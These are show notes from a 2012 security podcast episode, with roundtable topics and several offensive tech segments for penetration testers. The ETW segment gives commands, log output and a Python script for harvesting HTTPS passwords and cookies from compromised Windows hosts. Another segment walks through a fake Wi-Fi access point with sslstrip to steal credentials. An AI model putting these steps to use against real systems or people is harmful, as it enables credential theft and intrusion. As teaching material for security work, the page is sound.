Episode300

From Paul's Security Weekly

Breast Cancer Research Foundation
Breast Cancer Fund

Click the images to donate now!


Watch the show live below or at http://pauldotcom.com/live August 31, 2012 10AM-6PM EDT



Corporate Sponsors:
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

SANS Las Vegas from October 26-27th will debut a new course titled "Embedded Device Security Assessments for the Rest of Us" which will teach students how to assess embedded systems of all varieties on pen tests and in your duties as a security professional. Register Here


Episode Media: Episode 300 Playlist (MP3 parts 1 through 8; each segment below also links its own audio)

Show Kick-Off: August 31, 2012 10:00AM EDT

Download Part 1 Audio (mp3)


Introduction

  • Click the links at the top of this page to donate!
  • Welcome the cast: Larry Pesce, Jack Daniel, Allison Nixon, Darren Wigley, Carlos Perez, John Strand
  • Welcome the crew: Dave "The AV Guy" Johnson, Mike "Executive Producer" Perez
  • Welcome the special guests: Alex Horan and Selena Proctor (Core Security Technologies), Ben Jackson, Jason Stallard and Josh Corman
  • Cover schedule for the day

PaulDotCom Security Training Courses

Puzzle Corner with Allison (10:15-10:30AM EDT)

Check back here at the start of the show for a blob of text. This will get you started with the puzzle. If you are some of the first people to solve the puzzle, we may have a position for you here at PaulDotCom (Hint: If you are just starting out and/or looking for an internship type position, be the first person to solve the puzzle!).

The puzzle will begin with base64 encoded text. This is your only hint! The answer will be revealed at the end of the day.

We moved the puzzle to pastebin as it was hogging space on the page. It's also in the historical edits of this page:

http://pastebin.com/60h5vva4


Challenge Answers:

Roundtable: Mobile Security - How Bad Does it Suck and How Do We Fix it? (10:30-11:30 AM EDT)

Watch the Video

Download Audio for This Segment (mp3)

Guests

  • Charlie Miller, Collin Mulliner, Zach Lanier, Josh Wright

Questions/Topics

Without question the security of mobile devices, both old and new, has suffered its share of problems. Since the first phones came on the market sporting the shiny new Bluetooth protocol, attackers have moved to take advantage of the mobile platform (the Cabir worm of June 2004 may be one of the first examples, a little over eight years ago). Since then, mobile devices have gained much more functionality, including Wifi, NFC, SMS (which saw early adoption long before Bluetooth), more robust operating systems, more storage, smaller form factors, and lower cost. Then of course Apple had to get in the mix, then Google, and now everyone has a smartphone. The really scary part is how heavily we rely on it for communications; I mean, where would we be without a phone that could TXT, email, Tweet and read your Facebook updates? All this functionality has made a phone essential, and has even given birth to new buzzwords such as BYOD. With all of this user adoption, functionality, and accessibility comes security FAIL for sure. But:

  • Just how bad does it suck?
  • What are some examples of the latest threats?
  • How likely is it that our phones will be attacked?
  • Some attacks require physical proximity, some do not, what poses the greater risk?
  • Is bandwidth and speed a limiting factor and when will that change?
  • How do we protect our precious smartphones?
  • What can organizations do to protect their users and their data?

Roundtable: End User Security Awareness Training Hot or Not? (11:30-12:30PM EDT)

Watch the Video

Download Audio Version (mp3)

Guests

  • Dave Aitel, Lance Spitzner, Javvad Malik, Dameon Welch-Abernathy (aka "Phoneboy"), SpaceRogue

Questions/Topics

Of all the topics we discussed for this episode, none sparked more passionate debate than the effectiveness of end user security awareness training. On one side, it's something we must do to help our organizations be resilient to attack: users must be trained not to "click shit", not to succumb to social engineering, and not to ignore malicious behavior. On the other side of the fence, it's a waste of time: not all users will "get it", and the attackers may only need one user to be a victim. The threats are constantly changing, so users will need constant training, and security will just "get in the way". Somewhere in the middle perhaps is a happy medium.

  • Can we do effective user awareness training?
  • What are the things we must have in our security awareness training?
  • Is it bad if we do nothing with respect to user awareness?
  • Should we implement a system of rewards (be malware free and get a free iPad!) or punishment (if malware is on your system you have to watch a 90 minute HR video)?

Break (12:30-12:45 PM EDT)

Stogie Geeks Show (12:45-2:00PM EDT)

Tech Segment: Data Mining Event Tracing for Windows by Mark Baggett (2:00-2:15 PM ET)

In this technical segment we will look at how to tap into the vast amounts of data that Windows components such as Windows Communication Foundation (WCF) and WinInet feed to Event Tracing for Windows (ETW). An ETW provider will sometimes log excessive amounts of information, giving an attacker access to sensitive data. By tapping into these otherwise silent logging mechanisms an attacker can find all kinds of useful information.

Segment Media

Video

MP3

About & Why

Why would you want to tap the ETW logs? Well, I suppose they could be really useful if you are trying to troubleshoot a system. More interesting, you might tap them if you would like to log usernames and passwords and steal secure cookies. You can even record that information from SSL-encrypted channels on remote computers. Sound interesting?

If you haven't already done so first you should check out the post I did back in July on the subject. That link is here.

There I show how you can use the "logman" utility to create an event trace file and then analyze it with wevtutil.exe. Logman enables ETW logging for a given "ETW provider", and used with the -o option it records those events to a log file that can be analyzed with wevtutil.exe. For example, I can capture HTTPS usernames and passwords as users attempt to log in to Google from any browser that uses the WinInet API (yes for IE; no for Firefox and Chrome) with the following commands.

C:\temp>logman create trace MySessionName -p Microsoft-Windows-WinInet -o mylogfile.etw -ets
The command completed successfully.

Now that logging is running we wait for our target to browse to an HTTPS-encrypted website and enter their username and password. Once they have logged in we stop the ETW session by giving logman the session name we used to turn on the logging. Then we use wevtutil.exe to dump the contents of the log and find the information we are looking for.

C:\temp>logman stop MySessionName -ets
The command completed successfully.

C:\temp>wevtutil qe mylogfile.etw /lf:True | find /i "passwd"
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-WinIN
Guid='{43d1a55c-76d6-4f7e-995c-64c711e5cafe}'/><EventID>212</EventID><Version>0</Version><Level>5</Level><Task>548</
><Opcode>0</Opcode><Keywords>0x8000020000000002</Keywords><TimeCreated SystemTime='2012-08-29T17:33:40.164114600Z'/>
ntRecordID>3318</EventRecordID><Correlation ActivityID='{00CC000C-FBB0-0278-2007-5408E261E100}'/><Execution ProcessI
824' ThreadID='432' ProcessorID='0' KernelTime='0' UserTime='1'/><Channel></Channel><Computer>workstation7</Computer
curity/></System><EventData><Data Name='RequestHandle'>0xcc000c</Data><Data Name='Length'>243</Data><Data Name='Head
>continue=https%3A%2F%2Fwww.google.com%2F&dsh=-1534317598323818212&hl=en&GALX=AjNqjhAEb0k&pstMsg=1&a
nConn=&checkConnection=youtube%3A281%3A0&checkedDomains=youtube&timeStmp=&secTok=&Email=pauldotc
mp;Passwd=sexysexylarry&signIn=Sign+in&rmShown=1</Data></EventData></Event>

Simple enough, right? Note what is actually happening: WinInet logs the request headers and body before they are handed to the SSL layer, so once you have a shell on a box you can read what looks like the inside of an established SSL connection, including active session cookies, without touching the encryption at all. Even better, logman has the "-s <computername>" option, which lets you enable logging on a remote host if you have administrative credentials for it.

But how did I find that "Microsoft-Windows-WinInet" provider name to turn on? The command "logman query providers" will generate a list of all the ETW providers registered on the current system. On my computer there are 636 different logging providers!

C:\temp>logman query providers > listofproviders.txt

C:\temp>type listofproviders.txt | find /c "{"
636

That is a lot of logs to check out. Ideally I'd like to turn on ALL the providers, run some programs on the host, and see what kind of treasures lie in each of their logs. Unfortunately, I didn't see a way to tell logman to enable logging for ALL providers and record everything, and if you try to turn them on one at a time you will start having problems after you enable the fifth or sixth provider. Fortunately, netsh also has an interface to enable and disable event tracing for all providers that participate in a given "scenario", and you can tell it to use "all" scenarios, which enables logging for a large number of providers at the same time.

C:\temp>netsh trace start scenario=all tracefile=FIREEVERYTHING.etl capture=yes correlation=yes

Trace configuration:
-------------------------------------------------------------------
Status:             Running
Trace File:         FIREEVERYTHING.etl
Append:             Off
Circular:           On
Max Size:           250 MB
Report:             Off

Now you exercise the application that you want to test and see what kind of excessive logging it might be doing. Then you disable your trace session with the command "netsh trace stop". When you do, netsh does something very nice: it correlates related events and generates several log files and reports containing some interesting data.


C:\temp>netsh trace stop
Correlating traces ... done
Generating data collection ... done
The trace file and additional troubleshooting information have been compiled as "C:\temp\FIREEVERYTHING.cab".
File location = C:\temp\FIREEVERYTHING.etl
Tracing session was successfully stopped.

As expected we have our "FIREEVERYTHING.etl" file that we can query with wevtutil.exe. This file holds the events recorded by multiple providers and has all kinds of interesting data in it. But there is also a .CAB file that is worth checking out.

C:\temp>dir FIREEVERYTHING*.*
 Volume in drive C has no label.
 Volume Serial Number is 2CE0-6D68

 Directory of C:\temp

08/29/2012  01:58 PM           510,144 FIREEVERYTHING.cab
08/29/2012  01:58 PM         3,276,800 FIREEVERYTHING.etl
               2 File(s)      3,786,944 bytes
               0 Dir(s)  13,022,461,952 bytes free


Contents of FIREEVERYTHING.cab (screenshot of the extracted archive; image not reproduced here)

Now that you can enable a larger number of providers, you can cast a wide net to identify which providers record high volumes of valuable data. Then you can go back to logman to enable targeted reconnaissance and avoid overwhelming a target. While you are looking through your event trace file the /f:Text option is useful: it renders the XML events in a human-readable format. Here is a human-readable example.

C:\temp>wevtutil qe FIREEVERYTHING.etl /lf:True /f:Text | more
Event[0]:
  Log Name: N/A
  Source: Microsoft-Windows-TCPIP
  Date: 2012-08-29T13:57:03.666
  Event ID: 1300
  Task: N/A
  Level: Information
  Opcode: Info
  Keyword: N/A
  User: N/A
  User Name: N/A
  Computer: workstationname
  Description:
TCP: connection 0x8483d678 (local=1.1.1.1:49480 remote=1.1.1.2:445) exists. State = EstablishedState. PID = 4.

However, it does drop some of the details. Some data is only displayed when the XML version is examined, which is important to remember as you are looking for treasures in the logs. Here is an example of searching for the "passwd" field in a gmail.com POST with and without the /f:Text option. With /f:Text it finds zero occurrences; without it, it finds two.

C:\temp>wevtutil qe FIREEVERYTHING.etl /lf:True /f:Text | find /c /i "passwd"
0

C:\temp>wevtutil qe FIREEVERYTHING.etl /lf:True | find /c /i "passwd"
2

These logs are not just recording actions taken by built-in programs like Internet Explorer. Any third-party tools that rely on the ETW-enabled APIs will also have their information recorded. So fire up the logging and go on a little treasure hunt!
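The `find /i "passwd"` above is a fine first pass, but once you are sifting through the XML from hundreds of providers you want the same hunt done programmatically. The script below is an added example for this page, not Mark's code: it takes the one-event-per-line XML that `wevtutil qe <file> /lf:true` prints (no document root, `&` escaped as `&amp;`), walks every `Data` element, splits HTTP header lines and URL-decodes form bodies, and flags fields whose names look like credentials. The two sample events are constructed to resemble Microsoft-Windows-WinInet events; the address, password and cookie values in them are made up, and the list of sensitive field names is an assumption you can extend.

```python
"""Mine `wevtutil qe <file> /lf:true` XML output for credential-bearing fields.

Added example for this page, not Mark Baggett's code. SAMPLE_XML is a constructed
stand-in for two Microsoft-Windows-WinInet events; all values in it are made up.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qsl

EVENT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Field or header names worth flagging (assumption; extend to taste).
SENSITIVE = re.compile(r"passw|pwd|secret|token|cookie|authorization", re.I)
# "Name: value" HTTP header line, as WinInet logs request headers.
HEADER_LINE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*):\s*(.*)$")

SAMPLE_XML = (  # constructed; wevtutil escapes '&' in the POST body as '&amp;'
    "<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>"
    "<System><Provider Name='Microsoft-Windows-WinInet'/><EventID>212</EventID>"
    "<Computer>workstation7</Computer></System>"
    "<EventData><Data Name='RequestHandle'>0xcc000c</Data><Data Name='Length'>97</Data>"
    "<Data Name='Headers'>continue=https%3A%2F%2Fwww.example.com%2F&amp;"
    "Email=alice%40example.com&amp;Passwd=hunter2&amp;signIn=Sign+in</Data>"
    "</EventData></Event>\n"
    "<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>"
    "<System><Provider Name='Microsoft-Windows-WinInet'/><EventID>210</EventID>"
    "<Computer>workstation7</Computer></System>"
    "<EventData><Data Name='RequestHandle'>0xcc000c</Data>"
    "<Data Name='Headers'>Host: www.example.com\nCookie: SID=abc123; HSID=def456</Data>"
    "</EventData></Event>\n"
)


def iter_events(xml_stream):
    """wevtutil writes one <Event> per line with no document root; wrap them so ElementTree accepts the stream."""
    root = ET.fromstring("<Events>" + xml_stream + "</Events>")
    return root.findall("e:Event", EVENT_NS)


def event_fields(event):
    """Return (provider name, event id, {Data Name: text}) for one event."""
    provider = event.find("e:System/e:Provider", EVENT_NS)
    event_id = event.findtext("e:System/e:EventID", default="0", namespaces=EVENT_NS)
    data = {d.get("Name"): (d.text or "") for d in event.findall("e:EventData/e:Data", EVENT_NS)}
    return (provider.get("Name") if provider is not None else None), int(event_id), data


def split_fields(text):
    """Yield (name, value) pairs from a Data payload: HTTP header lines, or a URL-encoded form body."""
    for line in text.splitlines():
        header = HEADER_LINE.match(line)
        if header:
            yield header.group(1), header.group(2)
        elif "=" in line:
            # parse_qsl undoes percent-encoding and turns '+' back into spaces
            yield from parse_qsl(line, keep_blank_values=True)


def find_secrets(xml_stream):
    """Scan every Data element of every event; return (provider, event_id, field, value) for sensitive fields."""
    hits = []
    for event in iter_events(xml_stream):
        provider, event_id, data = event_fields(event)
        for payload in data.values():
            for name, value in split_fields(payload):
                if SENSITIVE.search(name):
                    hits.append((provider, event_id, name, value))
    return hits


if __name__ == "__main__":
    import sys
    # Pipe real output in: wevtutil qe mylogfile.etw /lf:true | python etw_mine.py
    stream = SAMPLE_XML if sys.stdin.isatty() else sys.stdin.read()
    for provider, event_id, name, value in find_secrets(stream):
        print(f"{provider} event {event_id}: {name} = {value}")
```

Because the script works on the XML form of the events, it sees the `EventData` payload that the `/f:Text` rendering leaves out, which is the same reason the text-mode `find` above reports zero hits for "passwd" while the XML dump reports two.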

Installation & Running

All of the tools required to launch this attack are built into Windows Vista, Windows Server 2008 and later.

Results

Using these tools and doing a little digging you will find that Event tracing is a great way to capture data from a machine that you've compromised.

References

Here are some helpful links:

Logman: http://technet.microsoft.com/en-us/library/cc788036%28WS.10%29.aspx

Wevtutil http://technet.microsoft.com/en-us/library/cc732848%28v=ws.10%29.aspx

Programming with WinINet http://technet.microsoft.com/en-us/subscriptions/aa279322%28v=vs.60%29.aspx

Plugs

Follow me on Twitter @MarkBaggett and Join me for SEC504 Hacker Techniques, Exploits and Incident Handling.

Register here today!

Eighty from Dual Core (2:15PM - 2:45PM EDT)

Roundtable: Defending Your Network - What really works? (3:00-3:45PM EDT)

Guests

  • Wendy Nather, Iftach Amit, David Mortman, Dan Crowley, RSnake

Questions/Topics

"We have a firewall." "All of our systems use anti-virus software." "We've implemented the latest web application firewalls and intrusion prevention systems." "We have a patching cycle, weekly maintenance windows and a 30-day patch turn-around." These are things we've all heard before. These are things I often hear right before we are about to start a penetration test. Depending on how you define success, these things do little to stop attackers.

  • What are we doing wrong when it comes to defense?
  • What is the number one thing that organizations miss when it comes to defense?
  • Should we even bother, and just know that a certain percentage of attackers will be successful?
  • Can't we just do the easy and cheap security "things" and get by as long as we don't get owned as badly as our competition?

Tech Segment: Making Sense of Security Data Using AWESIEM by Conrad Constantine (4:00-4:15 PM EDT)

About & Why

After years of making security databases, I realized that security information doesn't match up to the way databases have to be normalized. I started looking at ontology languages and triple stores instead to store security info, and am now working on an app framework for writing security apps using an ontology storage backend; it's called AWESIEM. Here's my intro on how to use ontologies for infosec knowledge.

Demo: simple ontologies and a triple store using SESAME

Installation & Running

Getting SESAME running under TOMCAT, then loading an ontology.

Results

  • Adding some data, and then querying it with SPARQL (think SQL, for semantic data)
  • Reading Ontology data over HTTP
  • Browsing through it visually with SPARQLbrowser
  • Adding new relationships.

References

SESAME: a full-featured, rapid deployment RDF/SPARQL Triple Store http://www.openrdf.org/

Web Ontology Language Specification http://www.w3.org/TR/owl2-overview/

NEoN Toolkit - an IDE for OWL Ontologies. http://neon-toolkit.org

SPARQLBrowser – an AIR client for browsing ontologies via SPARQL http://code.google.com/p/sparql-browser/

RDFLib - a Python Module to access semantic Data https://github.com/RDFLib

Plugs

http://labs.alienvault.com http://awesiem.net

Tech Segment: Automating Wifi Attacks by John Strand (4:15-4:30 PM ET)

In this Tech Segment we will talk about one of the easiest ways to create an evil access point to steal credentials. We will be using the very cool utility called easy-creds, which can be found at the link below:

http://code.google.com/p/easy-creds/

There are a number of reasons to use this script. Sure, you can set the whole thing up by hand, but a major goal of any tester should be to automate as much as possible, to make your job as easy as possible. The example we are going to walk through requires you to download the script above and copy it to the /pentest/wireless directory on your BackTrack system. We also recommend you get a good wireless card for the task. May we recommend the Alfa AWUS051NH?

First, lets navigate to the directory where you saved easy-creds.sh and start it up:


# cd /pentest/wireless

Start Easy Creds


# ./easy-creds.sh

For this Tech Segment we will be creating an evil wireless access point.

Choose Option 3 FakeAP attacks

You could do an evil twin, but that would include some DoS attacks. Instead we will just create a new access point.

Choose Option 1 FakeAP Attack Static

Enter /tmp for the path for saving log files.

Yes, you do want to include the sidejacking attack, so choose y. We do this because we want to include attacks like sslstrip.

Enter eth1 for your interface connected to the Internet

Choose wlan0 for your wireless interface

Choose a random channel to broadcast on (1-11)

Choose mon0 for your monitor interface

Choose at0 for your tunnel interface

You do not have a dhcp.conf file. Choose n

Enter a network range of 10.10.10.0/24

Enter a DNS server of 8.8.8.8

COUNT TO 45.. Quietly..

Now, if you are playing with this at home, on authorized systems which you own or have permission to test, connect to your access point and google for gmail. Click the gmail link and you will be redirected to a version of gmail that is http and not https. Enter some bogus data.

Then...

Choose 4 Data Review

Choose 1 Parse SSLStrip log for accounts

Choose /tmp/easy-creds-[date/timestamp; remember, tab is your friend]/sslstrip[another date].log

Choose /pentest/wireless/definitions.sslstrip Your passwords should be at the bottom

All too easy.

Tech Segment: Using Windows Remote Management for Fun and Profit by Carlos Perez (4:30-4:45PM EDT)

Many times I have heard system admins talk about setting up OpenSSH on their Windows machines, and in the days of Windows NT, 2000 and 2003 I understood the need. Nowadays, with Windows 2008, Windows 2008 R2 and Windows 2012, Microsoft provides a way for us to administer the boxes remotely using what is called Windows Remote Management, or WinRM, which is the Microsoft implementation of the WS-Management protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems from different vendors to interoperate.

It comes with:

  • Windows 2003 (As a feature that needs to be installed)
  • Windows 2008 (Needs to be enabled)
  • Windows 2008 R2 (Needs to be enabled)
  • Windows 2012 (Enabled by default)

The WinRM service uses the underlying HTTP.sys subsystem in Windows to listen for connections on ports 5985 (HTTP) and 5986 (HTTPS). We should not be afraid of the word HTTP and assume it is not secure: with the default settings the SOAP payload is encrypted at the message level, and in a domain environment Kerberos is used for authentication. In a workgroup environment NTLMv2 is used for authentication, and there HTTPS is recommended. That protection goes away if Basic authentication or unencrypted traffic is allowed, which is why the GPO settings below disable both.

Among the commands available to us we have WinRS, which allows us to run remote commands on the host or to open a full interactive shell. For hosts that have PowerShell v2 or PowerShell v3 we can use PowerShell Remoting to open a full PowerShell session on the box.

To enable WinRM on the target with a HTTP listener we just run:

winrm quickconfig -q
This sets the WinRM service to start automatically, creates an HTTP listener on all interfaces whose network profile is not Public, and makes the appropriate changes to the Windows Firewall.

On the client side, if we are not in a domain we must modify the client settings to allow us to connect to a machine that is not part of the domain and to send NTLM credentials to it over HTTP. For that we run, from a command prompt as Administrator:

winrm set winrm/config/client @{TrustedHosts="RemoteComputerName"}

We could also use wildcards like *.pauldotcom.com or *. Once that is done we can connect and open a session to the target box.

C:\Users\Carlos Perez>winrs -r:http://192.168.1.166:5985 -u:administrator cmd.exe
Enter the password for 'administrator' to connect to 'http://192.168.1.166:5985'
:
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Administrator>hostname
WIN-74472FV4AB0

If what we want is a more flexible PowerShell session from within PowerShell we use the Enter-PSSession cmdlet:

PS >Enter-PSSession -ComputerName 192.168.1.166 -Credential administrator
[192.168.1.166]: PS C:\Users\Administrator\Documents> hostname
WIN-74472FV4AB0

If you want to enable WinRM remotely and cannot do it via GPO (because, say, Bob does not have access to the DC but does have credentials to the box), we can use PowerShell to run the command remotely through WMI and enable it for us:

PS > $process = get-wmiobject -query "SELECT * FROM Meta_Class WHERE __Class = 'Win32_Process'" -namespace "root\cimv2" -computername 192.168.1.166 -Credential administrator
PS > $process.Create("cmd.exe /c winrm quickconfig -q")

Configuration Control via GPO

Open Group Policy Manager and open the GPO you want to use.

  • Expand Computer Configuration -> Policies -> Administrative Templates -> Windows Components -> Windows Remote Management (WinRM)
  • Select WinRM Service (the listener setting lives there; the authentication settings below exist under both WinRM Service and WinRM Client and should be set on both)

Enable:

  • Allow automatic configuration of listeners -> provide the allowed IPv4/IPv6 ranges
  • Allow CredSSP authentication

Disable:

  • Allow Basic Authentication
  • Allow Unencrypted Traffic

To enable WinRM Firewall Exception thru Group Policy for Windows Client OS (Windows Vista, Windows 7 and Windows 8):

  • Open Group Policy Manager and open the GPO you want to use.
  • Expand Computer Configuration ->Expand Policies -> Expand Administrative Template -> Expand Network -> Expand Network Connections -> Expand Windows Firewall
  • Select Domain Profile
  • Enable Define inbound port exceptions:
  • Click on Show
  • Enter 5985:TCP:*:enabled:WinRM
  • Enter 5986:TCP:*:enabled:WinRM(if HTTPS will be configured)
  • Click Ok and Apply

To Control Shell settings when a user uses WinRS or PSSession:

  • Open Group Policy Manager and open the GPO you want to use.
  • Expand Computer Configuration ->Expand Policies -> Expand Administrative Template -> Expand Windows Components
  • Select Windows Remote Shell and set the setting based on your policy

Tech Segment: Larry & Darren Hack Naked At Night (4:45-5:15 PM ET)

PFSense for pentesters

So, we use PFSense every day and love it. I also love the nice red Soekris box that we built. After using it day to day, we've found that it is great, but has a few things that drive us nuts. Specifically, when you put two guys behind it doing two pentests or vuln scans, the box just can't stand up unless properly configured.

So, we're going to install it on a real PC. This PC we happened to pull from the trash; it is some 64-bit AMD system with 2 GB of RAM. Total cost? Free. It is probably way more horsepower than we need for this situation, but it is what we've got.

First, go download and burn a copy of PFSense 2.0.1 from http://www.pfsense.org/downloads. I know, burn to CD, how retro. Then boot from CD and accept the default boot options.

On boot, it will ask to assign interfaces for WAN and LAN. In our case it would not autodetect either the LAN or WAN interface, so we just observed the console messages while plugging the cable in and assigned them appropriately. Once complete it boots into the PFSense menu.

From the menu, we need to do the install with option 99, select the defaults, and wait and reboot.

We've done this part already, as the wait takes a while and makes for crappy TV.

Once we've rebooted, time to hit a shell and change the root password. Once that's done, I like to enable SSH. If we exit the shell, it might also be a good time to set up our interfaces with option 2; we can now set DHCP, IP addresses and so forth. With that done, off to the web configurator!

One of the first things I like to do once we log in with the default admin/pfsense user/password pair is change the password. It can be found under System, User Manager, and Edit for the admin user. Don't forget to SAVE.

Next, turn on HTTPS for the web interface under System, Advanced, and change the Administrative Access to WebConfigurator to HTTPS. Of course, one might want to do that before the password is changed…

Ok, we are allegedly secure!

Next up, some creature conveniences.

Me, I like having PFSense hand out DHCP addresses to LAN clients, and statically assign DHCP addresses to servers and such. But by default it does not add the DHCP hostnames to the local resolver. I mean, who can remember all of these numbers? I give these machines names for a reason! Let's enable adding the hosts to the local resolver under Services, DNS Forwarder, and check Register DHCP leases… and Register DHCP static mappings…

Another one that may be considered a creature comfort (for a home) is a freaking DMZ! Yes, the box we are configuring today has 5 interfaces. We used the onboard ethernet and an older Intel 4-port ethernet adapter (that means the hardware support under PFSense rules). In our case, we had to bust out the Dremel and cut an aluminum heat sink in half to make this card fit; the sheer size of the card got in the way. If you want to add interfaces after the fact, it is fairly easy to do, under Interfaces (assign). It will create the interface with an OPTX name (optional interface), which you can rename from the Interfaces, OPTX menu options. Fix up all your settings, such as a static IP address, and enable the interface while you are there.

Next up, the single most important option that I've found for using PFSense for pentesting? The firewall maximum state table size. The default on my Soekris box was something like 400 states. Run a WAY low and slow Nessus scan? Device tips over. Crank up the sessions so it will work for the same test, say 190,000 states? Device tips over half the time depending on IP range size, this time not from running out of states but from running out of RAM and CPU. This is why I'm moving to real hardware: I set my state table to 750,000 and have the option to go higher. The setting is Firewall Maximum States on the Firewall/NAT tab under System, Advanced. This one you will want to keep an eye on, as the larger the number here, the more memory and CPU it will use, so watch CPU and memory alongside the tuning of your scans.

Next up, we want to make sure all of our Metasploit shells connect back to us, right? We should probably set up a rule for that. One rule to rule them all. That is under Firewall, NAT 1:1 (if you have multiple external addresses), or Rules, depending on your setup. This should be fairly self-explanatory for most of us, or has so many potential options that we could spend all day discussing the use cases.

So, with that, go forth, hack naked and keep an eye on your connections.  :-)

Hack your Car with CANBUS

CANBUS hacking…

A little intro in a few minutes. Yes, as implied, it is a BUS and you can gain access to it from the OBD-II port. Think a hub: all messages on a segment go to all devices on the segment. Messages can be filtered by a gateway (think firewall) between the various busses, which may or may not be exposed at the OBD-II port.

Ok, about the messages. They are a little different from the networks we are familiar with. First off, a message does not have a source field, but it does have a destination of sorts in the form of an arbitration ID, 11 bits long in a standard frame or 29 bits in an extended frame. The arbitration ID also sets priority: the lower the arbitration ID, the higher the priority, so a frame with ArbID 0 wins the bus over every other frame contending at the same time. Each message is sent to the bus with an ArbID, and each device LISTENS for the specific ArbIDs it is concerned about. With that, gateways can pass specific messages, and each device can look for multiple messages. Oh, and the payload? At most 8 bytes, so fairly easy to fuzz.
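To make the arbitration rule concrete, here is an added Python example (not from the segment) that models the bits a node drives during arbitration for both frame formats, picks the winner among frames contending in the same bit slot, and applies an ECU-style acceptance filter. It goes beyond the 11-bit case above: a 29-bit extended frame competes on its 11-bit base first and then loses the SRR/IDE bits to a standard frame with the same base, so a numerically larger extended ID can still beat a standard one. The frames are constructed in candump notation; 0x7DF and 0x7E8 are the usual OBD-II diagnostic request/response IDs and 0x18DB33F1 the 29-bit functional request, chosen only as illustration.

```python
"""CAN arbitration and acceptance filtering on candump-style frames.

Added example for this page, not from the segment. Frames in the demo are constructed;
0x7DF/0x7E8 are the common OBD-II diagnostic request/response IDs, 0x18DB33F1 the 29-bit
functional request, used here only to illustrate priority.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    can_id: int             # 11-bit (standard) or 29-bit (extended) identifier
    data: bytes             # classic CAN carries 0..8 payload bytes
    extended: bool = False
    rtr: bool = False       # remote transmission request: no payload, asks for one

    def __post_init__(self):
        limit = 1 << (29 if self.extended else 11)
        if not 0 <= self.can_id < limit:
            raise ValueError(f"identifier {self.can_id:#x} does not fit the frame type")
        if len(self.data) > 8:
            raise ValueError("classic CAN frames carry at most 8 data bytes")


def parse_candump(line):
    """'7DF#0201050000000000' -> Frame. can-utils prints 3 hex digits for 11-bit IDs, 8 for 29-bit."""
    ident, _, payload = line.strip().partition("#")
    rtr = payload.upper().startswith("R")
    data = b"" if rtr else bytes.fromhex(payload)
    return Frame(int(ident, 16), data, extended=(len(ident) == 8), rtr=rtr)


def arbitration_bits(frame):
    """Bits a node drives during arbitration, MSB first. 0 is dominant and overrides a recessive 1."""
    if not frame.extended:
        ident = [(frame.can_id >> i) & 1 for i in range(10, -1, -1)]
        return tuple(ident + [int(frame.rtr), 0])            # ..., RTR, IDE=0
    base, ext = frame.can_id >> 18, frame.can_id & 0x3FFFF
    bits = [(base >> i) & 1 for i in range(10, -1, -1)]      # 11-bit base ID
    bits += [1, 1]                                             # SRR=1, IDE=1 (both recessive)
    bits += [(ext >> i) & 1 for i in range(17, -1, -1)]      # 18-bit extension
    return tuple(bits + [int(frame.rtr)])


def arbitrate(frames):
    """Winner when all frames start in the same bit slot: the first node to drive 0 while others drive 1 keeps the bus.

    Lexicographic order on the arbitration bits is exactly that rule, which is why a lower identifier
    has higher priority and why an extended frame is compared on its 11-bit base before anything else.
    """
    ranked = sorted(frames, key=arbitration_bits)
    if len(ranked) > 1 and arbitration_bits(ranked[0]) == arbitration_bits(ranked[1]):
        raise ValueError("two nodes drove the same identifier at once: bus error, not a priority decision")
    return ranked[0]


def accepts(frame, filter_id, mask):
    """Hardware acceptance filter as an ECU uses it: pass if the masked identifier bits match."""
    return (frame.can_id & mask) == (filter_id & mask)


if __name__ == "__main__":
    sample = ["7DF#0201050000000000", "7E8#034105500000", "18DB33F1#0201050000000000", "636#00"]
    frames = [parse_candump(line) for line in sample]
    winner = arbitrate(frames)
    print(f"bus goes to {winner.can_id:#x} (extended={winner.extended})")
    seen = [f"{f.can_id:#x}" for f in frames if accepts(f, 0x7E8, 0x7F8)]
    print("an ECU filtering 0x7E8-0x7EF sees:", seen)
```

The filter is the same ID/mask pair a CAN controller's acceptance registers hold, which is why an ECU only ever "hears" the IDs it was built to care about while everything else still passes by on the wire.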

Ok, so why is this important? Well, I can't talk about my recent experience as I'm under NDA, but we can think about it from the hacker perspective. Modern cars have 5+ computers that control a whole bunch of automotive functions, from engine control to door locks to entertainment. Think about how they can interact. Oh, and think about the foibles that may have been made… such as no authentication to gain access to the bus, no replay protection, weak challenge-response for some functions, flashing over the bus, etc…

How about some hardware? Well, there are a few options. I had some recent experience with the ValueCAN 2-channel (http://intrepidcs.com/osc_store/index.php/cPath/21) at about $400, which is an OBD-II to USB adapter for your computer for use with their free software, VehicleSpy. It is free to sniff traffic, but if you want to inject traffic you need to register the software, and that will cost $2400. Yikes. There are a few things coming from the GoodFET folks, such as Q with his ornithopter release of a GoodFET board specifically for CANBUS. Of course I can't find a link, so time for me to get in touch with Q. But Q's board is intended to be open source and usable for sniffing and injection.

Ok, great. We can hack our own cars. But think about the current state and future of vehicle computing: in-dash computers connected to the Internet, on the CANBUS, that could inject and receive traffic as part of their operation. How about the radio links for upcoming V2V communications for convoys, automatic vehicle control and so forth… yay! Let's connect vehicle control via CANBUS wirelessly: brakes, engine speed, safety features…

Now, think about these and how easy it might be to get into them; the hard part may be getting into the vehicle at all, which of course is no obstacle if you travel a lot and rent cars…

Go forth and hack.

Roundtable: “Is Pentesting Worth It?” (5:15-6:00 PM ET)

Guests

  • Ed Skoudis, Dave Kennedy, Ron Gula, Weasel

Questions/Topics

Once upon a time a big bad pen tester gets a contract with 3 little pigs, Inc. On the first test, he huffs, and he puffs and blows down the network made of straw. On the next test, you build it out of sticks, and you get the same result (everyone now, he huffs and he puffs and he…). On the next test, you build your network out of bricks, and the big bad pen tester shows up with a wrecking ball, knocks down the house and presents you with an invoice.

(strange sci-fi sound)

